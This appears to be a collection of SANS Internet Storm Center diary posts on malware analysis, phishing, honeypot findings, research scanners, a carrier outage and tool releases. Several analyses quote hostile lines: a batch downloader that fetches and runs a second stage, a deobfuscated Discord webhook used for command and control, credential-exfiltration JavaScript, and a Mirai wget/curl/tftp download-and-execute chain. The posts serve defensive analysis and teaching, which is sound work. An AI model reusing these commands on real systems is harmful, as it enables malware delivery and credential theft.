Published: 2024-02-23

Simple Anti-Sandbox Technique: Where's The Mouse?

Malware samples have plenty of techniques to detect if they are running in a "safe" environment. By safe, I mean a normal computer with a user between the keyboard and the chair, programs running, etc. These techniques are based on checking the presence of specific processes, registry keys, or files. The hardware can also be a good indicator (are some devices present or not?)

Some techniques rely on basic checks that can be easily implemented in a simple Windows script (.bat) file. I found an interesting one that performs a basic check before downloading the next payload. The file has the following SHA256 hash: 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb[1]

set "mouseConnected=false"

for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do (
    set "mouseConnected=true"

if not !mouseConnected! == true (
    exit /b 1

The script uses the WMI ("Windows Management Instrumentation") client to query the hardware and filter interesting devices. Here is an output generated on a regular computer:

C:\Users\REM\Desktop>wmic path Win32_PointingDevice get PNPDeviceID /value




Indeed some basic sandboxes do not have a mouse connected to them. Easy trick! Note that, in a lot of organizations, access to the "wmic" tool is prohibited for normal users because it can be used to perform a lot of sensitive actions.

If no mouse is detected, the script will fetch its copy of a minimal Python environment and install it:

set "eee=https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe"
set "eeee=python-installer.exe"
curl -L -o !eeee! !eee! --insecure --silent
start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0 > NUL 2>&1
del !eeee!

Finally, it will download and execute the second stage:

set "ENCODED_URL=hxxps://rentry[.]co/zph33gvz/raw
set "OUTPUT_FILE=webpage.py"
curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure
if %ERRORLEVEL% neq 0 (
    echo Error: Failed to download the webpage.
    exit /b 1
python -m %OUTPUT_FILE%

The second stage is another InfoStealer. Nothing special except the way the DIscord channel used as C2 is obfuscated:

webhook = b'\xc8~~\xc9(T>>\x10\x1e(\x82=\xa1\x10\x95\x82=$>\xbc\xc9\x1e>lM1\xc8=={(>\xb08-Z-\xb3-\x8b8\x8b\x1b\xb0\xb3\xb0\xb08\x87Z\x8b>\xf91\xe0f&\x82g\xe0\xa7g\x98\xf0Y\xd60\xcdX\xb4\xb4\xfe\xa6\xc9\xc9l~Y(g\xf8\x1c&\x82\xd6Nf\x87e\xe0\xf7)\xf70e_,8\xfe\xa6Z\x1c\xe28M\xaf_\xc6,1E\xf7N_\xf2,_\x1b\ne',b'x.\x8d\\V+\xb1c\x94\x9cw\xb5\x8c\t]\x12\r\x91[5y\x8a\x15L\xe5Bq\xd0\xa5\x0c\xd9\xe8\x9f\xdd\x93J\xd4\x88\xb8\x84\xa3K\x02\x0f\xa8E\x95>-\xb08\x87\x8b\x1b\xb3\xf2\x18ZTG\x16\xb2i\xcf\x11\xb4\xf7\x07\x1cuOY\xcd\xe0_,m&\xf0\xaaX\xfeW\xaf\x90\xf9\xc6\xae\xf8\x08\n\x7f\xab\x014e\x9a\xbc1\x82\x10M)f\xc8\x1e\xd6{g$\xe2=\xc9\x98\xa1(~N\xc5l\xa6\xa70\xba/\x053\xb6b\xfd"\xde\xa4h\x9bId\xc1\xc4\xb9\x96\xf3\x83\x06\xbd2H\xc7\xc0\xd5z\xa0\x99ao\xef\x13r\x1dP7\x14v\xa2\xeek\xeb\xe1\xbf9}:R\xe7\'\xbb<DQ\x9e^\xfc\xad%\x8e\x1f\x97\xc2U\x19\x86\x17\x81\xff\xea\xfa\x9dF\xa9p!\xcc#\xc3C\x85\xdc|\xf5j;\xbeA\xec\xe4\x80\xd2\xf4S\xb7\xdb\xe9\x89\xcb\xd76\x0b\xe3`@\x92\x03\xf1s\xfbn\xf6\xd1\xda\xd3\x0e\xd8t\x00\x8f\xed\xe6\xac \xdf\x04\xca?*\x1a\xce'

Is it decrypted using this simple function:

def DeobfuscateWeb(encrypted_text, key):
    decrypted = [0] * 256
    for i, char in enumerate(key):
        decrypted[char] = i

    decrypted_text = []
    for char in encrypted_text:
        decrypted_char = decrypted[char]

    return bytes(decrypted_text)

and returns "hxxps://discord[.]com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_"

[1] https://www.virustotal.com/gui/file/460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant


Published: 2024-02-22

Large AT&T Wireless Network Outage #att #outage

[UPDATE] As of 11:30am ET, AT&T states that about 75% of its network is operational, and they are recovering the rest. Several news sources noted that Verizon and T-Mobile may also have outages. This is likely due to a misinterpretation of "Downdetector", a website monitoring various websites for user complaints about outages. Other carriers are also often mentioned, leading to them showing up in Downdetector. For example, Apple Support is also showing problems, according to Downdetector. This may likely be due to AT&T customers calling Apple, suspecting the phone is broken after being unable to connect to the cellular network. Some 911 systems are reporting increased call volume due to the outage.


Beginning this morning, AT&T's cellular network suffered a major outage across the US. At this point, AT&T has not made any statement as to the nature of the outage. It is far too early to speculate. In the past, similar outages were often caused by misconfigurations or technology failures.

What makes the outage specifically significant is that phones cannot connect to cell towers in some areas. This means you cannot make any calls, send or receive SMS messages, or reach emergency services. Some iPhones display the "SOS" indicator, which is displayed if the phone is able to make emergency-only calls via another provider's network. For some newer iPhones, satellite services may be used.

As a workaround, WiFi calling is still reported to work. If you do have an internet connection via a different provider and are able to enable WiFi calling, you will be able to make and receive calls.

Note that this will affect many devices like location trackers, alarm systems, or other IoT devices that happen to use AT&T's network. This could have security implications if you rely on these devices to monitor remote sites.

Some users are reporting that service has already been restored in their area, but without an official statement from AT&T, it is hard to predict how long service restoration will take. For your own planning purposes, I would assume it will be several hours for the service to be fully restored.

Some other workarounds to consider:

  • Many modern phones will allow for a second eSIM to be installed. T-Mobile and WiFi sometimes offer free trials of their network, and it may get you going for the day.
  • As mentioned above, WiFi calling is reported to work.
  • Get a data-only eSIM with a low-cost provider with enough data to "survive" the day.

For resiliency, it is always best to have a secondary internet connection available. In many cases, the cellular connection is your secondary connection. The outage also effects AT&T resellers (MVNOs) like Cricket, Consumer Celular, and Straight Talk.

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Published: 2024-02-22

[Guest Diary] Friend, foe or something in between? The grey area of 'security research'

[This is a Guest Diary by Rachel Downs, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].

Scanning on port 502

I’ve been running my DShield honeypot for around 3 months, and recently opened TCP port 502. I was looking for activity on this port as it could reveal attacks targeted towards industrial control systems which use port 502 for Modbus TCP, a client/server communications protocol. As with many of my other observations, what started out as an idea to research one thing soon turned into something else, and ended up as a deep dive into security research groups and the discovery of a lack of transparency about their actions and intent.

I analysed 31 days of firewall logs between 2023-12-05 and 2024-01-04. Over this period, there were 197 instances of scanning activity on port 502 from 179 unique IP addresses.


Almost 90% of scanning came from security research groups

Through AbuseIPDB [2] and GreyNoise [3], I assigned location, ISP and hostname data (where available) to each IP address. GreyNoise assigns actors to IP addresses and categorises these as benign, unknown or malicious. Actors are classified as benign when they are a legitimate company, search engine, security research organisation, university or individual, and GreyNoise has determined the actor is not malicious in nature. Actors are classified as malicious if harmful behaviours have been directly observed by GreyNoise, and if an actor is not classified as benign or malicious it is marked as unknown [4]. 

I used this classification, additional data from AbuseIPDB, and the websites of self-declared security research groups to categorise the scanning activity observed in my honeypot firewall logs.


89% of the total scanning activity was attributed to security research groups, 3% was attributed to known malicious actors and 8% was unknown.

Who are these researchers, and why are they scanning?

Almost half of the activity classified as security research came from two groups: Stretchoid and Censys. Other frequently observed groups included Palo Alto Networks, Shadowserver Foundation, InterneTTL, Cyble and the Academy for Internet Research. The remaining groups were only observed scanning port 502 once or twice each, including Shodan.


The motivations of these different research groups varies, and for some their purpose is unclear or unstated. Some are academic research projects, some are commercial organisations collecting data to feed into their products and services, and others are less clear.

Stretchoid was the most active actor identified, accounting for 25% of security research activity. There is very little information available about them, aside from an opt-out page. The page states “Stretchoid is a platform that helps identify an organisation’s online services. Sometimes this activity is incorrectly identified by security systems, such as firewalls, as malicious. Our activity is completely harmless” [5]. However, there is a lack of transparency around the organisation responsible for Stretchoid and as such, online discussions about them urge caution around submitting data through the opt-out form [6].

Censys conducts internet-wide scanning to collect data for its security products and datasets [7].

Palo Alto Networks were able to be identified using the ISP name, however they did not enable reverse DNS lookup for hostnames to identify the scanner being used. These IP addresses are marked as benign in GreyNoise and attributed to Palo Alto’s Cortex Xpanse product.

Shadowserver Foundation describe themselves as “a nonprofit security organisation working altruistically behind the scenes to make the internet more secure for everyone” [8].

InterneTTL’s website was not active at the time of this report, however GreyNoise points to it being a security research organisation that regularly mass-scans the internet [9].

Cyble describes its ODIN product as “one of the most powerful search engines for internet scanned assets”. It carries out host searches, asset discovery, port scanning, service identification, vulnerability detection and certificate analysis [10].

The Academy for Internet Research’s website states they are “a group of security researchers that wish to make the internet free, safe and accessible to all” [11].

bufferover.run is identified by GreyNoise as a commercial organisation that performs domain name lookups for TLS certificates in IPv4 space. GreyNoise has marked this actor as benign but it is unclear why they are carrying out port scanning activity [12].

Crowdstrike was seen twice via scans from Crowdstrike Falcon Surface (Reposify), which they describe as “the world’s leading AI-native platform for unified attack surface management” [13].

SecurityTrails is a Recorded Future company offering APIs and data services for security teams [14].

Shodan scanners were seen twice. These are used to capture data for Shodan’s search engine for internet-connected devices [15].

Alpha Strike Labs is a German security research company producing open source intelligence about attack surfaces using global internet scans. They claim to maintain more than 2000 IPv4 addresses for scanning [16].

BinaryEdge “scan the entire public internet, create real-time threat intelligence streams and reports the show the exposure of what is connected to the internet” [17].

CriminalIP is an internet-exposed device search engine run by AI Spera [18].

Internet Census Group is led by BitSight Technologies Inc and states data is collected to “analyse trends and benchmark security performance across a broad range of industries” [19].

Internet Measurement is operated by driftnet.io and is used to “discover and measure services that network owners and operators have publicly exposed”. They offer free access to an external view of your network from the data they have gathered [20].

Onyphe describes itself as a “cyber defence search engine” [21]. They provide an FAQ about their scanning on their website.

The Technical University of Denmark’s research project aims to identify “digital ghost ships” [22], devices which appear to be abandoned and un-maintained.

A lack of transparency

The UK's National Cyber Security Centre (NCSC), when launching its own internet scanning capability, provided some transparency and scanning principles [23] that they committed to following, and encouraged other security researchers to do the same:

  • Publicly explain the purpose and scope of the scanning system
  • Mark activity so that it can be traced back to the scanning system being used
  • Audit scanning activity so abuse reports can be easily and confidently assessed
  • Minimise scanning activity to reduce impact on target resources
  • Ensure opt-out requests are simple to send and processed quickly

Adherence to these principles varied between the research groups observed, but was generally quite poor among the more prolific scanners in this observation. It was not possible to observe whether research groups were auditing scanning activity, so this is not rated in the table below.

Fig 4: An analysis of security research groups’ adherence to NCSC’s ethical scanning principles

Fig 5: A guide to the ratings used in Fig 4


This lack of transparency makes it difficult to determine whether this activity is truly benign.

Good practice is demonstrated by Onyphe, who provide information about their scanning and their “10 commandments for ethical internet scanning” on their website. Along with the Technical University of Denmark, they also provide a web server on each of their probes which explains the purpose, intent and the ability to opt out.  

Why does this matter?

The volume of scanning activity related to security research is significant, and has an impact on honeypot data. This has been discussed in a previous ISC blog post by Johannes Ullrich, “The Impact of Researchers on Our Data” [24]. Quick and accurate identification and filtering of research activity enables honeypot operators to more rapidly identify malicious activity, or activity that requires further investigation.

Equally, the presence of honeypot data in security research scans impacts the conclusions that will be drawn by researchers about the presence of open ports and vulnerable systems, and the estimated scale of these issues.

Although researchers themselves may not be using the data collected for malicious purposes, they may lose control of how the data is used once it is shared or sold elsewhere. For example, Shodan scanning activity is classed as security research, however the resulting data can be used by attackers to find vulnerable targets. 

Some of the organisations involved in this scanning are profiting from the data collected from your systems, utilising your resources to do this. Ethical researchers should allow you to opt-out of this data collection.

Security research is a broad term, and the intent behind scanning activity is not always clear. This makes security research something of a grey area, and means transparency is key in order for informed decisions to be made.

What should I do?

As a honeypot operator, or someone responsible for monitoring internet-facing systems, you may decide to reduce scanning noise by blocking security research traffic. This is made difficult when researchers don’t publish the IP addresses they use, or don’t provide the ability to opt-out. To help with this, the ISC provides a feed of IP addresses used by researchers through their API [25].

All activity relating to Stretchoid, the most active research group in this observation, originated from DigitalOcean. Some users recommend blocking DigitalOcean’s IP ranges (unless this is required for your organisation) as an alternative to opting out. 

A number of GitHub projects also exist to track the IP ranges of Stretchoid and other security research groups, such as szepevictor’s stretchoid.ipset [26].

Research groups could do more to build trust and help security teams separate benign activity from malicious. If you carry out internet scanning activities, it’s a good idea to follow the NCSC guidance discussed in this blog post to maintain transparency and allow others to make informed decisions about allowing or blocking your scans. 

Enabling reverse DNS and using hostnames that identify your organisation or scanner is a good way to make your scanning activity identifiable, and an informative web page with a clear explanation of the purpose of data collection, including the ability to opt out, helps demonstrate your positive intentions. 

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://www.abuseipdb.com
[3] https://www.greynoise.io
[4] https://docs.greynoise.io/docs/understanding-greynoise-classifications
[5] https://stretchoid.com/
[6] https://www.reddit.com/r/cybersecurity/comments/10w2eab/stretchoid_phishing_and_recon_campaign/
[7] https://about.censys.io/
[8] https://www.shadowserver.org/
[9] https://viz.greynoise.io/tag/internettl?days=1
[10] https://getodin.com/
[11] https://academyforinternetresearch.org/
[12] https://viz.greynoise.io/tag/bufferover-run?days=1
[13] https://www.crowdstrike.com/products/exposure-management/falcon-surface/
[14] https://securitytrails.com/
[15] https://www.shodan.io/
[16] https://www.alphastrike.io/en/how-it-works/
[17] https://www.binaryedge.io/
[18] https://www.criminalip.io/
[19] https://www.internet-census.org/home.html
[20] https://internet-measurement.com/
[21] https://www.onyphe.io/about
[22] https://www.dtu.dk/english/newsarchive/2023/01/setting-out-to-sink-the-internets-digital-ghost-ships
[23] https://www.ncsc.gov.uk/blog-post/scanning-the-internet-for-fun-and-profit
[24] https://isc.sans.edu/diary/The+Impact+of+Researchers+on+Our+Data/26182
[25] https://isc.sans.edu/api/threatcategory/research (append “?json” or “?tab” to view in JSON or tab delimited format)
[26] https://github.com/szepeviktor/debian-server-tools/blob/master/security/myattackers-ipsets/ipset/stretchoid.ipset

Jesse La Grew


Published: 2024-02-21

Phishing pages hosted on archive.org

The Internet Archive is a well-known and much-admired institution, devoted to creating a “digital library of Internet sites and other cultural artifacts in digital form”[1]. On its “WayBackMachine” website, which is hosted on https://archive.org/, one can view archived historical web pages from as far back as 1996. The Internet Archive basically functions as a memory for the web, and currently holds over 800 billion web pages as well as millions of books, audio and video recordings and other content… Unfortunately, since it allows for uploading of files by users, it is also used by threat actors to host malicious content from time to time[2,3].

Over the last few weeks, I came across two different phishing messages, which linked to archive.org.

URLs from both messages had similar structure, since they both pointed to directories created for individual Internet Archive users, and both passed the e-mail address of the recipient to the phishing page in the same manner – as an anchor hash attribute:


While the link from the first message was already dead when I got to it, the second one lead to a still active phishing page (this single SHTML page was the only content uploaded by the corresponding user account), which displayed a fake login window above an image of the legitimate website associated with the domain extracted from the e-mail of the recipient.

In the following image, you may see how it looked when “abc@isc.sans.edu” e-mail address was provided.

It is worth mentioning that the page used the same approach to load the logo and image of the legitimate website as a phishing page discovered by Johannes back in 2022[4], i.e., the logo was loaded using a call to clearbit.com, and the image of the website itself using a call to thum.io, as the following excerpt shows.


var ind=my_email.indexOf("@");
var my_slice=my_email.substr((ind+1));
var c= my_slice.substr(0, my_slice.indexOf('.'));
var final= c.toLowerCase();
var finalu= c.toUpperCase();
var sv = my_slice;

var image = "url('https://image.thum.io/get/width/1200/https://"+sv;"')"

$("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);

$("#logoimg").attr("alt", finalu);

document.getElementById("bgimg").style.backgroundImage= image;


This similarity with a historical phishing page turned out not to be too surprising, since even a quick look at the HTML code of the current page showed quite clearly, that it was mostly cobbled together from different pre-existing pieces of code.

This was done in quite a clumsy manner, for example:

  • some portions of code were included twice without reason,
  • there was an attempt to display a missing image (see the picture above – it was supposed to show a “norton.png” file – probably something along the lines of “this site is safe – it was scanned by an antivirus engine”),
  • the HTML code contained a CloudFlare tracking script (this was certainly included by mistake, since it was quite useless from the standpoint of the phishing author and in any case couldn’t function correctly), and
  • there was a large section of commented-out JavaScript code, including a part which contained the same elementary “anti-analysis” functionality I wrote about back in November[5].

  // prevent ctrl + s
// $(document).bind('keydown', function(e) {
// if(e.ctrlKey && (e.which == 83)) {
// e.preventDefault();
// return false;
// }
// });

// document.addEventListener('contextmenu', event => event.preventDefault());

// document.onkeydown = function(e) {
// if (e.ctrlKey && 
// (e.keyCode === 67 || 
// e.keyCode === 86 || 
// e.keyCode === 85 || 
// e.keyCode === 117)) {
// return false;
// } else {
// return true;
// }
// };
// $(document).keypress("u",function(e) {
// if(e.ctrlKey)
// {
// return false;      }
// else {
// return true;
// }});


In any case, if a victim were to input their credentials and press the (somewhat sub-optimally named) “Submit Query” button, the data would have been sent to a form hosted at submit-form.com – a online service allowing for easy gathering of information through forms without the need to set up any infrastructure.


dataType: 'JSON',
url: 'hxxps[:]//submit-form[.]com/8dcxPGp2',
type: 'POST',
            website: sv,


Although the two phishing messages and the page mentioned above are hardly examples of the most dangerous or sophisticated threats, they do show quite well that abuse of legitimate services by threat actors is rampant and that vigilance among users of modern internet must be never-ending.

It is also worth noting, that even though the URLs that the phishing messages contained pointed to archive.org, they didn’t point to the second level domain itself, but to fourth level subdomains related to user-assigned data… And since a quick test seems to indicate that the WayBackMachine itself only uses domains archive.org, web-static.archive.org and web.archive.org to provide the historical view of the internet, if one wanted to, one could easily detect/hunt for/block attempted access to any potentially malicious content that might be uploaded to the Internet Archive service by arbitrary users (i.e., in the same way as the phishing page discussed above was) by simply looking for fourth-level subdomains on archive.org (or for any archive.org sub-domain besides the three mentioned above)…

It should also be mentioned that although I have flagged the Internet Archive hosted file as being used for phishing through an archive.org reporting mechanism, and also reported the use of the specific Submit Form form for malicious activities several days ago, both are unfortunately still up at the time of writing…

[1] https://archive.org/about/
[2] https://blog.rootshell.be/2017/04/20/archive-org-abused-deliver-phishing-pages/
[3] https://isc.sans.edu/diary/Malicious+Content+Delivered+Through+archiveorg/27688
[4] https://isc.sans.edu/diary/web3+phishing+via+selfcustomizing+landing+pages/28312
[5] https://isc.sans.edu/diary/Phishing+page+with+trivial+antianalysis+features/30412

Jan Kopriva
Nettles Consulting


Published: 2024-02-20

Python InfoStealer With Dynamic Sandbox Detection

Infostealers written in Python are not new. They also onboard a lot of sandbox detection mechanisms to prevent being executed (and probably detected) by automatic analysis. Last week, I found one that uses the same approach but in a different way. Usually, the scripts have a list of "bad stuff" to check like MAC addresses, usernames, processes, etc. These are common ways to detect simple sandboxes that are not well-hardened. This time, the "IOD" (Indicators Of Detection) list is stored online on a Pastebin-like site, allowing the indicators to be updated for all scripts already deployed. It's also a way to disclose less interesting information in the script.

The file, called main.py, has a VT score of 22/61 (SHA256: e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06)[1]

The script will fetch indicators from many files hosted on rentry.co[2]:

remnux@remnux:/MalwareZoo/20240217$ grep hxxps://rentry[.]co main.py 
     processl = requests.get("hxxps://rentry[.]co/x6g3is75/raw").text
     mac_list = requests.get("hxxps://rentry[.]co/ty8exwnb/raw").text
     vm_name = requests.get("hxxps://rentry[.]co/3wr3rpme/raw").text
     vmusername = requests.get("hxxps://rentry[.]co/bnbaac2d/raw").text
     hwid_vm = requests.get("hxxps://rentry[.]co/fnimmyya/raw").text
     gpulist = requests.get("hxxps://rentry[.]co/povewdm6/raw").text
     ip_list = requests.get("hxxps://rentry[.]co/hikbicky/raw").text
     guid_pc = requests.get("hxxps://rentry[.]co/882rg6dc/raw").text
     bios_guid = requests.get("hxxps://rentry[.]co/hxtfvkvq/raw").text
     baseboard_guid = requests.get("hxxps://rentry[.]co/rkf2g4oo/raw").text
     serial_disk = requests.get("hxxps://rentry[.]co/rct2f8fc/raw").text

All files were published on January 27 2024 around 23:19 UTC. The website gives also the number of views. Currently, there are only two (certainly my visits) so the script hasn't been released in the wild yet. I'll keep an eye on these counters in the coming days.

Here is an example of usage:

def checkgpu(self):
    c = wmi.WMI()
    for gpu in c.Win32_DisplayConfiguration():
        GPUm = gpu.Description.strip()
    gpulist = requests.get("https://rentry.co/povewdm6/raw").text
    if GPUm in gpulist:

The remaining part of the stealer is very classic. I just extracted the list of targeted websites (cookies are collected and exfiltrated):

keyword = [

You can see that classic sites are targeted but generic keywords are also present like "crypto", "bank" or "card". Cookies belonging to URLs containing these keywords will also be exfiltrated.

[1] https://www.virustotal.com/gui/file/e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06/details
[2] https://rentry.co

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant


Published: 2024-02-18

YARA 4.5.0 Release

YARA 4.4.0 was released, including the announced LNK module.

But the same day, YARA 4.5.0 was released without LNK support. It looks like the LNK module will only be released with the new YARA rewrite in Rust.


Didier Stevens
Senior handler
Microsoft MVP


Published: 2024-02-18

Wireshark 4.2.3 Released

Wireshark release 4.2.3 brings 20 bug fixes.

And if you are upgrading Wireshark 4.2.0 or 4.2.1 on Windows you will need to download and install this or later versions manually.

Didier Stevens
Senior handler
Microsoft MVP


Published: 2024-02-18

Mirai-Mirai On The Wall... [Guest Diary]

[This is a Guest Diary by Rafael Larios, an ISC intern as part of the SANS.edu BACS program]

About This Blog Post

This article is about one of the ways attackers on the open Internet are attempting to use the Mirai Botnet [1][2] malware to exploit vulnerabilities on exposed IoT devices. My name is Rafael Larios, and I am a student at the SANS Technology Institute’s Bachelor’s in Applied Cyber Security program. One of the requirements for completion of this degree, is to participate in an internship with the Internet Storm Center as an apprentice handler. Throughout this article, I will provide some insight on an attack method I found to be interesting.

It’s All About Mirai...

There are many sources discussing Mirai and a vulnerability found in IoT devices that allows attackers to join a host to their botnet. This malware still has relevance and continues to be used in attempts to compromise undefended systems. In 2023 at least three CVEs involving Mirai have been reported: CVE-2023-1389 [3], CVE-2023-26801 [4], and CVE-2023-23295 [5]. The malware continues to evolve since its initial creation in 2016. More on the humble origins of this malware can be found in the citations at the end of this article.

What Happened?

This article does not involve malware reverse engineering, but an analysis of how an attacker executed their plans on our honeypot. I observed such an attack using Cowrie that took place on 20 August 2023 that stood out from the list of attacks on the TTY logs. Wikipedia describes Cowrie as “...a medium interaction SSH and Telnet honeypot designed to log brute force attacks and shell interaction performed by an attacker. Cowrie also functions as an SSH and telnet proxy to observe attacker behaviour to another system”. More information can be found on Github:


The size of the recorded attack was significantly larger at 177kb compared to average logged attacks that were half the size or less. After analysis, the observed attack involved a trojan downloader for a botnet.

Playing back the TTY log entry with the Python playlog utility from within Cowrie, I found that the attacker used 51 SSH commands before the connection was terminated. This explains the size of the log.

The attack seemed automated, and involved various system checks, before downloading 312bytes to the /tmp folder with the following command:

wget http://46.29.166[.]61/sh || curl -O http://46.29.166[.]61/sh || tftp 46.29.166[.]61 -c get sh || tftp -g -r sh 46.29.166[.]61; chmod 777 sh;./sh ssh; rm -rf sh

The chain of commands attempts to use built-in Linux tools to download a file called ‘sh’ from an IP address from Moscow, Russian Federation. It wants to either use wget, curl, or tftp to download ‘sh’. It later tries to execute ‘sh’ and the SSH command, only to later remove the downloaded binary ‘sh’.

An error occurred and bash output stated that the command was not found. The attacker then tried to delete any existing files of what it was about to add to the /tmp folder. The following command was used to accomplish this:

rm -rf x86; rm -rf sshdmiori

Afterwards the attacker obtained information about the honeypot’s CPU with the following command:

cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo

We now come to the next stage of the attack.

Hexadecimal to Binary Executable
Within the 51 executed commands, 41 of them were hexadecimal numbers being echoed to a file named ‘x86’. Below is one of the 41 commands:

echo -ne "\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x51\xe5\x74\x64\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> x86

After concatenating all of the hexadecimal numbers into a binary file, I was able to acquire the SHA256 hash using CyberChef, a tool created and maintained by GHCQ, and can be accessed on Github as well: https://github.com/gchq/CyberChef
SHA256: b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852
Each one of the echo commands were copied and pasted into CyberChef, and a ‘recipe’ was used to decode the string from hexadecimal to binary, and then saved as an executable.

Why All of the Hexadecimal Numbers and Commands?

It is clear that the attacker wanted to evade being detected by assembling the malware binary executable from the victim device, rather than risk triggering anti-malware tools by downloading a malicious executable. When consulting the Mitre ATT&CK Framework, there are two key tactics used in this attack that are worth considering:

  • Tactic: Execution (TA0002)
    • Technique: Command and Scripting Interpreter: Unix Shell (T1059.004)
  • Tactic: Defense Evasion (TA0005)
    • Technique: Obfuscated Files or Information: Command Obfuscation (T1027.12)

What is It?

The assembled binary’s hash comes up on various databases as malicious, and categorized as a ‘Trojan.Mirai / miraidownloader’ [6], with several entries from community members attributing it to Mirai malware. Not much is known about this Linux elf executable. Many databases list it as a low threat score of 3/10. However, just because the score is low does not mean this binary is safe. More information about the malware sample can be found on Recorded Future’s Triage webpage [7]

How Can Mitigate Against This Kind of Attack?

Our honeypot emulates a poorly defended device on the open Internet. This particular attack scans for open SSH ports attached to devices with weak administrative credentials. Since Mirai based malware targets IoT devices, one of the simplest forms of defense is to change the default password of the IoT device to an unused complex long password (16 characters would be fine). Routers and Apache servers that are targets, should be patched according to the guidance on the CVEs. By not exposing IoT devices unnecessarily to the Internet, we can avoid compromise as well.

Samples of the malware can be downloaded on Virus Total and the Recorded Future[7] websites within the citations below.

[1] What is a Botnet?: https://www.akamai.com/glossary/what-is-a-botnet
[2] What is Mirai?: https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/
[3] TP-Link WAN-Side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal: https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal
[4] Akamai SIRT Security Advisory: CVE-2023-26801 Exploited to spread Mirai Botnet Malware: https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet
[5] Mirai Variant IZ1H9 Exploits: 13 Shocking New Attacks: https://impulsec.com/cybersecurity-news/mirai-variant-iz1h9-exploits/
[6] Virus Total: https://www.virustotal.com/gui/file/b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852
[7] Recorded Future Triage: https://tria.ge/230526-dk1rrsde63
[8] https://www.sans.edu/cyber-security-programs/bachelors-degree/

Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Published: 2024-02-15

[Guest Diary] Learning by doing: Iterative adventures in troubleshooting

[This is a Guest Diary by Preston Fitzgerald, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].

A DShield honeypot [2] running on a raspberry Pi can sometimes be a bit of a fickle thing. While some may enjoy a ‘set it and forget it’ experience, I’ve found that my device sometimes requires a bit of babysitting. The latest example of this popped up when I connected to the device to inspect logs last week. What began as curiosity about failed log parsing led to learning about the DShield updater.


The honeypot collects various potentially interesting artifacts for analysis. One source of this data is the webhoneypot.json file /srv/db/webhoneypot.json. Using jq, we can quickly parse this JSON for information about what remote hosts we’ve seen or what user agents they presented when they made requests to the honeypot:

jq '.headers | .host' webhoneypot.json | sort | uniq > ~/ops/hosts-DD-MM
jq .useragent webhoneypot.json | sort | uniq > ~/ops/agents-DD-MM

Part of the experience of monitoring a system like this is finding what feels good to you and what practices help you produce results. Some handlers will work to implement automation to identify interesting artifacts. Some will hunt and peck around until something catches their eye. One thing I’ve found works for me is periodically dumping information like this to file.

Roadblock ahead

What happened last week? My trusty tool jq returned a cry for help:

parse error: Invalid numeric literal at line 1, column 25165826

honeypot.json is malformed in some way. To make matters worse, the Pi was periodically crashing. It’s difficult to get any meaningful work done when your SSH sessions have a lifespan of 2 minutes. I decided to pull the card so I could inspect it directly, removing the Pi itself from the equation.

I plugged my card reader into a lab machine and instructed VMware to assign ownership of the device to a Slingshot[3] VM. 

Figure 1: VMware Workstation can treat a device connected physically to the host as if it were connected directly to the guest Virtual Machine. This feature is accessible in the VM -> Removable Devices menu. This card reader is labeled Super Top Mass Storage Device

With the Pi’s storage now mounted to the VM, it’s possible to navigate to the offending file and inspect it.

Figure 2: Screenshot showing the mounted file system 'rootfs' and the contents of /srv/db including webhoneypot.json

Notably, this file occupies nearly half a gigabyte of the card’s limited storage space. That’s a big text file! 

To the toolbox

Where did jq encounter its parsing error again?

parse error: Invalid numeric literal at line 1, column 25165826

It doesn’t like the 25,165,826th character (out of over 450 million total characters). How do we find out what’s in that position? What tools can we use? Another interesting quality of the file is that it consists of one single line. Go-to tools like head and tail are rendered less useful due to the single-line format. Though the file size is within vim’s documented maximum, I found that it struggled to open this file in my virtualized environment.

Thankfully awk’s substring feature will allow us to pluck out just the part of the file we are interested in working with.

Figure 3: Screenshot showing awk’s substring feature. Syntax: substr(string, starting index, length) here we are starting on character 25165820 and grabbing the following 20 characters.


We can begin to see what’s going wrong here by manipulating the starting index and length of the substring and comparing it to prettified JSON that jq is able to output from an earlier entry before it encounters its parsing error:

Figure 4: Screenshot showing expanded substring to get more context before and after the parsing error

Figure 5: Screenshot showing sample JSON structure from part of the document before the parsing error. Here we can see the end of the user agent string underlined in yellow, and the e": 72 part underlined in pink. Comparing the output of awk to the JSON structure we can see just how much information is missing between the two.


The JSON structure has been destroyed because the text is truncated between the user agent and part of the signature_id object. Unfortunately, patching up the structure here and re-running jq revealed that there are many such holes in the data. It didn’t take more than a couple of these mending and jq processing cycles to realize that it was futile to try sewing it all back together.


